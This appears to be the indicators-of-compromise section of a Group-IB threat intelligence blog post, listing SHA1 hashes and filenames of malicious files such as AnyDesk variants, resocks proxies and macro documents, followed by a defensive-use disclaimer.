SHA1    270dbaedfbeef9333e0780f3c4e74c01392ce381   AnyDesk38.exe
SHA1    d3fa50a9eba93a7fbc79e7ad0c4889d762718a5f   FMAPP.dll
SHA1    392a36717fa948f7e00d35711e8598108fbe2f72   client.exe
SHA1    62ed16701a14ce26314f2436d9532fe606c15407   FMAPP.dll
SHA1    ceb9b7dfb8a36ee8fe223063a6e3f730f2dcefd1   resocks-64.dll
SHA1    88cb6169fd7dd21e6d6aa3a8df0a78938e698028   resocks-32.exe
SHA1    d0d7d0c816753639b5c577aacf14fd2e994b64b0   reset.ps1
SHA1    b55e063607e8f56c9b398b289ba04ddca11398fe   AnyDesk14.exe
SHA1    5c1500296857ed0b0bb7230a1cb17993d25ab69b   resocks-32.dll
SHA1    f449b95830c584cef72dfb60fb78ee3d6c69ecb4   x.exe
SHA1    3c47eab6ebe5b48097c0099ff18f2a8bc13c12f7   AnyDesk72.exe
SHA1    324918c73b985875d5f974da3471f2a0a4874687   FMAPP.exe
SHA1    e21564fd0fc3103c1d18b1e1525a0b40e9077d40   ThisDocument.cls
SHA1    feb4318a90057d92ea5ab6420ed6164dd9605013   ThisDocument.cls
SHA1    0365daf83e37d2c6daaae6c28b4c8343288ef2f9   intercom.doc
SHA1    777040bed9d26f5da97e8977c6efc0586beae064
SHA1    f5a129ba4141361ca266950dc4adcb2c548aa949
SHA1    f77499a8fc6e615e21bf111a88c658ba3d5f0f81
SHA1    dc785be0c4430bfc5b507255f892bf30134a02b6   attachment.xls
SHA1    e79ccc3f6517c911d6c1df79c94e88896f574e64   ticket.doc
SHA1    2eea39dbe11889e5713cbca020f7ede653bc48ec   ThisWorkbook.cls
SHA1    975c763e050d0a9a46f0aafdde66d3e7f0626c5b   ticket.doc
SHA1    d97d21536c061e7a7151a453242d36f3ab196a14   %USERPROFILE%\downloads\pic.log
SHA1    56380a652471962387693f4bcc893fd21f0fc324
SHA1    9defffba933fc44f8e3b6e25b31508bc17d29077   CertificationKit.exe
SHA1    efb18cf7cf227037e034c0b525f502e642815f94   avp.exe
SHA1    0588cf26b6e9210f86a266ac0366af1fd29f135c
SHA1    80cea18e19665c5a57e7b9ca0bf36aad06096e93   burn.exe
SHA1    7d3757d5165e2e95b0b89e33316025a4b9301e2d   aee523056d602571ff006565b432148715a6a13d098d518ba8131ccbe719c043
SHA1    ac982b7b46e085e0bb51cba2edb61bff5910b6a8   3a19c19d9f3bac6628a968110477ee01e5867b2534e914e1be5c4485947bd819
SHA1    8632b62fa14fd679fa97cfe50e6c25696b846129   ThisDocument.cls
SHA1    ea80deaed00c8b71aa0033b00fe0ef5b63840b99   ThisDocument.cls
SHA1    92e2f826804d762679b13283102f3560078eb4cb   ThisDocument.cls

DISCLAIMER: All technical information, including malware analysis, indicators of compromise and infrastructure details provided in this publication, is shared solely for defensive cybersecurity and research purposes. Group-IB does not endorse or permit any unauthorized or offensive use of the information contained herein. The data and conclusions represent Group-IB’s analytical assessment based on available evidence and are intended to help organizations detect, prevent, and respond to cyber threats.

Group-IB expressly disclaims liability for any misuse of the information provided. Organizations and readers are encouraged to apply this intelligence responsibly and in compliance with all applicable laws and regulations.

This blog may reference legitimate third-party services such as Telegram and others, solely to illustrate cases where threat actors have abused or misused these platforms.